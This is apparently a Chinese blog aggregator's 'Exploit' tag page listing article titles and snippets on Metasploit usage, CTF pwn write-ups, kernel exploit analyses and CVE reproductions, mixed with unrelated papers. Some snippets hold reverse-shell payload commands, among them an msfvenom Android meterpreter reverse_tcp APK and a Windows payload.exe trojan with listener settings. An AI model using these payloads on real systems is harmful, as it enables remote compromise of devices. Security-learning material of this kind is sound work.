Exploit

网络安全学术顶会——S&P 2023 议题清单、摘要与总结(中)

注:本文由ChatGPT与Claude联合生成51、EffectiveReDoSDetectionbyPrincipledVulnerabilityModelingandExploitGeneration
riusksk·2023-06-12 00:13

kaliwin10免杀

中新增加的一个免杀模块后面的四个模块可以不用配置环境使用模块五useevasion/windows/process_herpaderping#选择模块五setlhost172.20.201.15#设置本机的监听地址exploit
偷吃"游"的阿彪·2023-06-11 07:59

6篇论文速览多模态最新研究进展

6篇最新论文1.CLIP-VG:Self-pacedCurriculumAdaptingofCLIPviaExploitingPseudo-LanguageLabelsforVisualGro
深度之眼·2023-06-10 23:22

Exploits模块和Payloads模块

1.exploits模块命名规则;系统/服务/名称例如:windows/smb/ms08_067_netapiRHOST:目标主机ip地址RPORT:目标机连接端口Payload:有效荷载,成功后返回shellLHOST
小明都能被取名·2023-06-10 21:56

漏洞利用 --- VSFTPD 2.3.4 后门

Metasploit工具(1)术语解释:渗透攻击(Exploit):指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。
雨天_·2023-06-10 18:21

网安笔记——msf基础使用

msf简单操作show:showexploits可利用漏洞showpayloads攻击载荷showoptions显示配置showauxiliary辅助模块showtargets显示目标search:查找漏洞
Russ0West·2023-06-10 17:17

随着网络犯罪策略的转变,暗网威胁瞄准能源行业

其中包括美国、加拿大、英国、法国、意大利和印度尼西亚的流行暗网论坛(如Exploit、RaidForums和BreachForums)上的目标。
网络研究院·2023-06-10 08:47

metasploit所有攻击方式(干货)

metasploit安卓渗透msfvenom-pandroid/meterpreter/reverse_tcpLHOST=........LPORT=4444R>/sdcard/hack,apkuseexploit
超脱491·2023-06-09 16:39

Exploit/CVE-2010-0738

打开JBoss的潘多拉魔盒:JBoss高危漏洞分析*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。前言JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB1.1、EJB2.0和EJB3规范。但JBoss核心服务不包括支持ser
ok060·2023-06-09 15:19

【CTFHUB-WriteUp】pwn技能树-栈溢出-Ret2VDSO

目录程序分析保护检查IDA静态分析伪代码分析汇编代码分析GDB调试分析分析总结漏洞利用及原理可利用漏洞1.栈溢出利用利用思路利用原理2.srand(seed)的不安全引用利用思路利用原理Exploit1
暮诚Mucream·2023-06-09 05:16

本地提权漏洞分析【网络安全】

0.前言CVE-2023-21752是2023年开年微软第一个有exploit的漏洞,原本以为有利用代码会很好分析,但是结果花费了很长时间,难点主要了两个:漏洞点定位和漏洞利用代码分析,欢迎指正。
不是程序媛呀·2023-06-08 18:52

CVPR 2023 Award Candidate(12 篇)

CVPR2023AwardCandidate(12篇)下载链接12篇AwardCandidate论文百度网盘下载链接提取码:6xwy论文统计主题篇数NeRF2DiffusionModel2论文名主题MobileNeRF:ExploitingthePolygonRasterizationPipelineforEfficientNeuralFieldRenderingonMobileArchitect
培之·2023-06-08 10:13

小迪安全|第10天:信息收集-资产监控拓展

目录1.Github监控exp:全称Exploit,是指漏洞利用的意思,指利用系统漏洞进行攻击的动作,一般是个DEMO程序,exp是利用漏洞是建立在POC之下,通常exp是一种攻击手段是有害的。
楚楪·2023-06-08 10:10

【小迪安全day10】信息收集——资产监控拓展

而EXP全称是Exploit,中文译作漏洞利用程序。它是对POC验证结果的一种漏洞利用脚本。)(2)便于发现相关测试目标的资产创建一个git.py文件:#Title:wecha
RichUee·2023-06-08 10:05

【kernel exploit】CVE-2022-2602 UNIX_GC错误释放io_uring注册的file结构-UAF

本文主要参考[漏洞分析]CVE-2022-2602io_uringUAF内核提权详细解析并做一些补充。影响版本:LinuxKernel"MemoryDebugging"->"KASan:runtimememorydebugger"。$make-j32$makeall$makemodules#编译出的bzImage目录:/arch/x86/boot/bzImage。漏洞描述:io_uring组件中有
bsauce·2023-06-08 04:31

《WEB安全渗透测试》(36) JAVA反序列化工具ysoserial使用介绍

项目地址:https://github.com/frohoff/ysoserial作者介绍:Aproof-of-concepttoolforgeneratingpayloadsthatexploitunsafeJavaobjectdeserialization.ysoserial
午夜观星河·2023-06-07 18:07

客户端渗透攻击基础知识-渗透测试模拟环境(8)

客户端渗透攻击(Client-sideExploit)指的是攻击者构造畸形数据发送给目标主机用户在使用含有漏洞缺陷的客户端应用程序处理这些数据时,发生程序内部处理流程的错误,执行了内嵌于数据中的恶意代码
luozhonghua2000·2023-06-07 17:29

google和edge浏览器崩溃,错误代码: STATUS_STACK_BUFFER_OVERRUN

转载:(146条消息)GoogleChrome谷歌浏览器崩溃,错误代码:STATUS_STACK_BUFFER_OVERRUN_刘墨泽的博客-CSDN博客解决办法:1、开始菜单搜索:ExploitProtection
小徐的博客·2023-06-07 09:00

Google Chrome谷歌浏览器崩溃,错误代码: STATUS_STACK_BUFFER_OVERRUN

错误代码:STATUS_STACK_BUFFER_OVERRUN解决办法:1、开始菜单搜索:ExploitProtection,打开进入。
刘墨泽·2023-06-07 09:54

STATUS_STACK_BUFFER_OVERRUN

单击开始菜单选择“设置”,进入到设置后选择“更新和安全”;打开系统后选择“windows安全中心”,并在右侧选择“打开windows安全中心”;点击左侧应用和浏览器控制;并在右侧选择“Exploitprotection
HA2504109493·2023-06-07 08:15

如何使用Metasploit进行后渗透攻击?

后渗透攻击(PostExploitation)是整个渗透测试过程中最能够体现渗透测试团队创造力与技术能力的环节。
网络安全大本营·2023-06-06 21:30

漏洞CVE-2022-1388

/usr/bin/python3importargparseimportrequestsimporturllib3urllib3.disable_warnings()defexploit(target,
x10n9·2023-04-21 09:19

什么是Realised Volatility

#本文内容相关论文Bollerslev,T.,Patton,A.andQuaedvlieg,R.(2019).Exploitingtheerrors:Asimpleapproachforimprovedvolatilityforecasting.RealisedVolatility
DCmf9w7Fnfm·2023-04-21 08:15

【网络安全】本地提权漏洞分析

0.前言CVE-2023-21752是2023年开年微软第一个有exploit的漏洞,原本以为有利用代码会很好分析,但是结果花费了很长时间,难点主要了两个:漏洞点定位和漏洞利用代码分析,欢迎指正。
网络安全-生·2023-04-21 05:07

SEED-缓冲区溢出攻击

实验环境:SEED-Ubuntu20.04虚拟机文章目录A.缓冲区溢出攻击实验准备a)缓冲区溢出原理b)分析生成badfile文件的exploit.py程序c)编译目标服务器上具有缓冲区溢出漏洞的stack.c
qq_53184526·2023-04-20 23:41

Metasploit payloads模块理解

payloadshellcode的编写三、MSF的Payloads模块payload分类payload的投递四、MSF模块功能参考一、payloads的使用继续来看永恒之蓝的漏洞利用过程:searchms17-010useexploit
藤原千花的败北·2023-04-20 21:43

[BUUCTF-pwn]——bjdctf_2020_babystack

exploitfrompwnimport*p=remote("node3.buuoj.cn",2
Y-peak·2023-04-20 18:28

【Tomcat】Apache Tomcat多个版本存在本地越权漏洞

漏洞CVE-ID:CVE-2022-23181漏洞风险等级:低(CVSSv2BaseScore:4.4|ImpactScore:6.4|ExploitabilityScore:3.4)漏洞说明(官方):
cnskylee·2023-04-19 18:18

Optimizing Queries Using Materialized Views: A Practical, Scalable Solution 论文阅读

especiallyforaggregationqueriesoverlargetables.Torealizethispotential,thequeryoptimizermustknowhowandwhentoexploitmaterializ
景达·2023-04-19 15:35

2020-05-07windows uac、mysql udf提权操作、提权常用命令

192.168.0.103LPORT=7777-fexe-opayload.exe木马生成将木马下载到物理机:szpayload.exe将木马放在虚拟机中,最后双击运行然后创建一个监听器msfconsolemsf5>useexploit
寻找tp·2023-04-18 10:13

vue2.0 源码调试环境搭建

一、下载源码gitclonehttps://github.com/vuejs/vue.git.错误一://错误一Cloninginto'/opt/exploit-database'...remote:Countingobjects
前端_七月·2023-04-18 07:50

漏洞中的一些名词

shellcodeexploit解释:-shellcode:通称缓冲区溢出攻击中植入进程的代码,这段代码可以是出于恶作剧的目的弹出一个消息框,也可以是出于攻击目的的删改重要文件、窃取数据、上传木马病毒并运行等
1Oin0·2023-04-17 15:25

实战打靶集锦-016-lampiao

提示:本文记录了博主打靶过程中一次曲折的提权经历文章1.主机发现2.端口扫描3.服务枚举4.服务探查4.180端口探查4.21898端口探查4.3EXP搜索4.3.1exploit/unix/webapp
阿尔泰野狼·2023-04-17 11:54

【kernel exploit】CVE-2022-2639 openvswitch模块kmalloc-0x10000堆溢出利用(pipe_buffer任意文件写技术)

测试版本:Linux-5.17.4exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory编译选项:CONFIG_OPENVSWITCH
bsauce·2023-04-17 09:18

【kernel exploit】CVE-2022-25636 nftables OOB 写堆指针漏洞利用

测试版本:Linux-5.13.19(原作者在Ubuntu21.10内核版本5.13.0-30中测试,成功率40%,由于用到msg_msg对象,所以只能用5.14以前的内核版本进行测试)exploit及测试环境下载地址
bsauce·2023-04-17 09:18

Exploit trick】利用poll_list对象构造kmalloc-32任意释放 (corCTF 2022-CoRJail)

保护机制:SMAP,SMEP,KPTI,KASLR及常用的保护机制,禁用了msgget()/msgsnd()/msgrcv()。源码文件下载:https://github.com/bsauce/CTF漏洞分析:kmalloc-4096中的off-by-one漏洞,溢出写入一个NULL字节。利用总结:利用poll_list对象来构造任意释放,取代msg_msg。需要用到子线程进行堆喷时(特别是喷射p
bsauce·2023-04-17 09:48

kernel exploit 有用的结构体

一、可用于Leak/AAR/AAW/RIP劫持的结构体说明目前缺少kmalloc-8、kmalloc-16、kmalloc-64、kmalloc-512结构体。1.shm_file_datasize:0x20kmalloc-32内核基址:可泄露。其ns、vm_ops指针可以泄露heap:可泄露。file指向堆区域stack:不能泄露劫持RIP:不能产生:调用shmat()映射共享内存释放:shmc
bsauce·2023-04-17 09:18

冰雪奇缘FrozenDay2

》Day2(00'11'39-00'15'39)FrozenD2双语台词Part1生词打卡Arendelle/'ɛrən'dɛl/n.阿伦黛尔王国coronation/kɔrə'neʃən/n.加冕礼exploit
plitt·2023-04-15 17:04

PSPNet论文翻译及解读(中英文对照)

PyramidSceneParsingNetworkAbstractSceneparsingischallengingforunrestrictedopenvocabularyanddiversescenes.Inthispaper,weexploitthecapabilityofglobalcontextinformationbydifferent-regionbasedcontextaggre
丁俊杰_·2023-04-15 08:56

论文阅读【15】Exploiting Local and Global Features in Transformer-based Extreme Multi-label Text Classific

论文十问十答:Q1论文试图解决什么问题?Q2这是否是一个新的问题?Q3这篇文章要验证一个什么科学假设?Q4有哪些相关研究?如何归类?谁是这一课题在领域内值得关注的研究员?Q5论文中提到的解决方案之关键是什么?Q6论文中的实验是如何设计的?Q7用于定量评估的数据集是什么?代码有没有开源?Q8论文中的实验及结果有没有很好地支持需要验证的科学假设?Q9这篇论文到底有什么贡献?Q10下一步呢?有什么工作可
Alan and fish·2023-04-13 22:24

jboss实战

image.png3.远程部署warimage.png后台访问···http://192.168.100.87:8080/jmx-console/···image.png1.查看系统名称java-jarjboss_exploit_fat.jar-ihttp
唐小风7·2023-04-13 07:42

Apache Struts2远程代码执行漏洞(S2-001)复现

0x01漏洞概述1、漏洞名称漏洞名称:StrutsRemoteCodeExploit漏洞编号:Struts2-001漏洞类型:RemoteCodeExecution2、漏洞原理Struts2是流行和成熟的基于
一年一更·2023-04-12 22:23

[POC分享] CVE: 2022-24112:Apache APISIX 2.12.1 - Remote Code Execution (RCE)

#ExploitTitle:ApacheAPISIX2.12.1-RemoteCodeExecution(RCE)#Date:2022-03-16#ExploitAuthor:Ven3xy#VendorHomepage
IT鹅·2023-04-10 22:42

Hack The Box Frolic WriteUp

两篇不错的参考文档:http://www.cis.syr.edu/~wedu/seed/Labs/Vulnerability/Return_to_libc/Return_to_libc.pdfhttps://www.exploit-db.com
小猪配不齐·2023-04-10 08:57

Vulnhub:DC-1靶机

p---script=http-enum192.168.111.248访问80端口发现CMS为drupal7搜索发现该版本的drupal存在漏洞searchsploitdrupal漏洞利用使用msf的exploit
ctostm·2023-04-09 09:38

「自然语言处理(NLP)」ACL && 阿里(舆论、立场检测)&& 耶鲁(电子邮件主题生成)

FirstBloodTILE:RumorDetectionByExploitingUserCredibilityInform
Shu灬下雨天·2023-04-09 06:26

【文献分享】探索作物中的广谱抗病性

这次分享的文章是近期由,中科院何祖华研究员和美国俄亥俄州立大学/中国农业科学院植物保护研究所王国梁教授受邀在AnnualReviewofPlantBiology撰写题为“ExploitingBroad-SpectrumDiseaseResistanceinCrops
巩翔宇Ibrahimovic·2023-04-08 12:01

shiro 权限绕过漏洞 CVE-2020-17523

0x00exploitpom的配置如下:org.apache.shiroshiro-core1.7.0org.apache.shiroshiro-spring1.7.0shiro认证的配置如下:ShiroFilterFactoryBeanbean
growing27·2023-04-06 11:19

[ 红队知识库 ] Windows & Linux 下常用的提权扫描辅助工具(含工具下载链接及使用介绍)

文章目录博主介绍一、使用Windows-Exploit-Suggester解析systeminfo1、简介2、下载地址:3
_PowerShell·2023-04-05 20:41

【kernel exploit】BPF漏洞挖掘与CVE-2020-27194 整数溢出漏洞

影响版本:5.8.x内核分支,v5.8.15以及更低的版本。该分支的发行版:Fedora33、Ubuntu20.10。编译选项:CONFIG_BPF_SYSCALL。漏洞描述:eBPF验证程序中进行or操作时,scalar32_min_max_or()函数将64位的值赋值到32位的变量上,导致整数截断,进而错误计算了寄存器的范围,从而绕过bpf的检查,导致越界读写。补丁:patchscalar32
bsauce·2023-04-04 19:12
上一页 3 4 5 6 7 8 9 10 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他